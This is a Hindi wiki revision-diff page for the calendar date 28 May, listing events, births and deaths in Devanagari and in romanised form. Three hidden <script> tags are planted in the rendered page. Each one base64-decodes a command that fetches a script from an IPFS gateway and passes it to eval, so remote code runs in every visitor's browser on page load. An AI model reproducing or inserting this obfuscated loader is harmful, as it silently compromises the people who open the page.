Difference between revisions of "28 मई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(7 intermediate revisions by 2 users not shown)
Line 4: Line 4:
  
 
==28 मई की महत्त्वपूर्ण घटनाएँ==
 
==28 मई की महत्त्वपूर्ण घटनाएँ==
* [[1996]] - रूस चेचेन्या को अधिकतम स्वायत्तता देने पर सहमत।
 
* [[1998]] - बलूचिस्तान की चगाई पहाड़ियों पर पाकिस्तान ने पाँच परमाणु परीक्षण किये, परमाणु परीक्षण के विरोध में सं.रा. अमेरिका ने पाकिस्तान के विरुद्ध आर्थिक प्रतिबंध लगाया।
 
* [[1999]] - बेंजामिन नेतान्याहू का संसद से इस्तीफ़ा, तुर्की में नयी गठबंधन सरकार का गठन।
 
* [[2000]] - भारत के राष्ट्रपति के. आर. नारायणन चीन के साथ द्विपक्षीय संबंधों को प्रगाढ़ करने के लिए छह दिनों की राजकीय यात्रा पर पेइचिंग पहुँचे।
 
* [[2002]] - नेपाल में फिर आपातकाल लगा।
 
 
* [[2008]] -  
 
* [[2008]] -  
 
**राष्ट्रपति [[प्रतिभा पाटिल]] ने [[इलाहाबाद]] उच्च न्यायालय में कार्यरत पाँच न्यायाधीशों को स्थायी न्यायाधीश नियुक्त किया। विमान सेवा जेट एयरवेज को 'मध्य एशिया सर्वश्रेष्ठ चरगो एयर लाइन्स' का पुरस्कार मिला।  
 
**राष्ट्रपति [[प्रतिभा पाटिल]] ने [[इलाहाबाद]] उच्च न्यायालय में कार्यरत पाँच न्यायाधीशों को स्थायी न्यायाधीश नियुक्त किया। विमान सेवा जेट एयरवेज को 'मध्य एशिया सर्वश्रेष्ठ चरगो एयर लाइन्स' का पुरस्कार मिला।  
**नेपाल में 240 साल पुरानी राजशाही का अवसान हुआ। अमेरिका ने पाकिस्तान परस्त आतंकवादी संगठन लश्कर-ए-तैयबा के चार नेताओं पर वित्तीय प्रतिबन्ध लगाया।  
+
**नेपाल में 240 साल पुरानी राजशाही का अवसान हुआ। अमेरिका ने पाकिस्तान परस्त आतंकवादी संगठन लश्कर-ए-तैयबा के चार नेताओं पर वित्तीय प्रतिबन्ध लगाया।
 +
* [[2002]] - नेपाल में फिर आपातकाल लगा।
 +
* [[2000]] - भारत के राष्ट्रपति के. आर. नारायणन चीन के साथ द्विपक्षीय संबंधों को प्रगाढ़ करने के लिए छह दिनों की राजकीय यात्रा पर पेइचिंग पहुँचे।
 +
* [[1999]] - बेंजामिन नेतान्याहू का संसद से इस्तीफ़ा, तुर्की में नयी गठबंधन सरकार का गठन।
 +
* [[1998]] - बलूचिस्तान की चगाई पहाड़ियों पर पाकिस्तान ने पाँच परमाणु परीक्षण किये, परमाणु परीक्षण के विरोध में सं.रा. अमेरिका ने पाकिस्तान के विरुद्ध आर्थिक प्रतिबंध लगाया।
 +
* [[1996]] - रूस चेचेन्या को अधिकतम स्वायत्तता देने पर सहमत।
  
 
==28 मई को जन्मे व्यक्ति==
 
==28 मई को जन्मे व्यक्ति==
 +
* [[1969]] - [[प्रतिमा भौमिक]] - [[भारतीय जनता पार्टी]] की राजनीतिज्ञ हैं।
 +
* [[1952]] - [[पिनाकी चन्द्र घोष]] - [[भारत]] के प्रथम लोकपाल हैं।
 +
* [[1940]] - [[प्रयाग शुक्ल]] - [[हिन्दी]] के [[कवि]], कला-समीक्षक, अनुवादक एवं [[कहानीकार]] हैं।
 
* [[1923]] - [[एन. टी. रामाराव]] - प्रसिद्ध अभिनेता एवं [[तेलुगु देशम पार्टी]] के संस्थापक थे।
 
* [[1923]] - [[एन. टी. रामाराव]] - प्रसिद्ध अभिनेता एवं [[तेलुगु देशम पार्टी]] के संस्थापक थे।
* [[1883]] - [[वीर सावरकर]] - भाषाविद, बुद्धिवादी, कवि, अप्रतिम क्रांतिकारी, दार्शनिक और ओजस्वी वक़्ता।
 
 
* [[1921]] - [[डी. वी. पलुस्कर]] - प्रसिद्ध शास्त्रीय गायक थे।
 
* [[1921]] - [[डी. वी. पलुस्कर]] - प्रसिद्ध शास्त्रीय गायक थे।
 
* [[1921]] - [[महन्त अवैद्यनाथ]] - भारतीय राजनीतिज्ञ तथा [[गोरखनाथ मंदिर|गोरखनाथ मठ]] के भूतपूर्व पीठाधीश्वर थे।
 
* [[1921]] - [[महन्त अवैद्यनाथ]] - भारतीय राजनीतिज्ञ तथा [[गोरखनाथ मंदिर|गोरखनाथ मठ]] के भूतपूर्व पीठाधीश्वर थे।
 +
* [[1915]] - [[गोपाल रामानुजम]] - भारतीय राजनीतिज्ञ, जानेमाने समाज सेवक और भारतीय राष्ट्रीय ट्रेड यूनियन कांग्रेस के सह-संस्थापक थे।
 +
* [[1883]] - [[वीर सावरकर]] - भाषाविद, बुद्धिवादी, कवि, अप्रतिम क्रांतिकारी, दार्शनिक और ओजस्वी वक़्ता।
  
 
==28 मई को हुए निधन==
 
==28 मई को हुए निधन==
 
* [[2005]] - [[गोपाल प्रसाद व्यास]] - [[भारत]] के प्रसिद्ध कवियों, लेखकों और साहित्यकारों में से एक।
 
* [[2005]] - [[गोपाल प्रसाद व्यास]] - [[भारत]] के प्रसिद्ध कवियों, लेखकों और साहित्यकारों में से एक।
 +
* [[1964]] - [[महबूब ख़ान]] - भारतीय सिनेमा इतिहास के अग्रणी निर्माता-निर्देशक थे।
 
* [[1954]]- [[विजय सिंह पथिक]] - प्रसिद्ध स्वतंत्रता सेनानी।
 
* [[1954]]- [[विजय सिंह पथिक]] - प्रसिद्ध स्वतंत्रता सेनानी।
* [[1964]] - [[महबूब ख़ान]] - भारतीय सिनेमा इतिहास के अग्रणी निर्माता-निर्देशक थे।
+
 
 
==28 मई के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==28 मई के महत्त्वपूर्ण अवसर एवं उत्सव==
 
+
* [[एमनेस्टी इंटरनेशनल डे]]
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}

Latest revision as of 09:34, 12 October 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 28 mee varsh ka 148 vaan (lip varsh mean yah 149 vaan) din hai. sal mean abhi aur 217 din shesh haian.

28 mee ki mahattvapoorn ghatanaean

  • 2008 -
    • rashtrapati pratibha patil ne ilahabad uchch nyayalay mean karyarat paanch nyayadhishoan ko sthayi nyayadhish niyukt kiya. viman seva jet eyaravej ko 'madhy eshiya sarvashreshth charago eyar lains' ka puraskar mila.
    • nepal mean 240 sal purani rajashahi ka avasan hua. amerika ne pakistan parast atankavadi sangathan lashkar-e-taiyaba ke char netaoan par vittiy pratibandh lagaya.
  • 2002 - nepal mean phir apatakal laga.
  • 2000 - bharat ke rashtrapati ke. ar. narayanan chin ke sath dvipakshiy sanbandhoan ko pragadh karane ke lie chhah dinoan ki rajakiy yatra par peichiang pahuanche.
  • 1999 - beanjamin netanyahoo ka sansad se istifa, turki mean nayi gathabandhan sarakar ka gathan.
  • 1998 - baloochistan ki chagaee paha diyoan par pakistan ne paanch paramanu parikshan kiye, paramanu parikshan ke virodh mean san.ra. amerika ne pakistan ke viruddh arthik pratibandh lagaya.
  • 1996 - roos chechenya ko adhikatam svayattata dene par sahamat.

28 mee ko janme vyakti

28 mee ko hue nidhan

28 mee ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>